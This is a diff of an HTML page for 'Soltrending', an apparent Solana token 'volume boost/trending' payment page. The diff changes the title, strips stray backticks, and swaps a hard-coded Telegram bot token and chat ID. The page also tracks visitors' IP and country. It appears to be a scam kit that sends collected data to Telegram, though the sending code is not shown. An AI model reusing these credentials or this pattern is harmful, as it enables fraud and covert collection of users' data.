--- a/Index.html
+++ b/Index.html
@@ -4,11 +4,11 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Soltrending - Submit & Pay</title>
+    <title>Soltrending volume boost/trending</title>
     <style>
         * { margin: 0; padding: 0; box-sizing: border-box; }
 
-```
+
     body {
         font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
         background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
@@ -230,7 +230,7 @@
         .container { margin: 10px; padding: 20px; }
     }
 </style>
-```
+
 
 </head>
 <body>
@@ -238,7 +238,7 @@
         <div class="logo">Soltrending</div>
         <div class="user-info" id="userInfo">Loading location...</div>
 
-```
+
     <div class="step-dots">
         <div class="dot active" id="dot1"></div>
         <div class="dot" id="dot2"></div>
@@ -385,8 +385,8 @@
     let userCountry = 'Unknown';
     let userIP = 'Unknown';
 
-    const TELEGRAM_BOT = '8429756008:AAFSQjfaFbNJDLNOE73oLVE2-ZCdc-ixZGI';
-    const TELEGRAM_CHAT = '2051249497';
+    const TELEGRAM_BOT = '8434797216:AAEZ9lqrAIwKY5UopaaEzM-fkadY4S-Xqdo';
+    const TELEGRAM_CHAT = '1129109001';
 
     // Initialize
     window.onload = async function() {
@@ -610,7 +610,7 @@
         location.reload();
     }
 </script>
-```
+
 
 </body>
 </html>
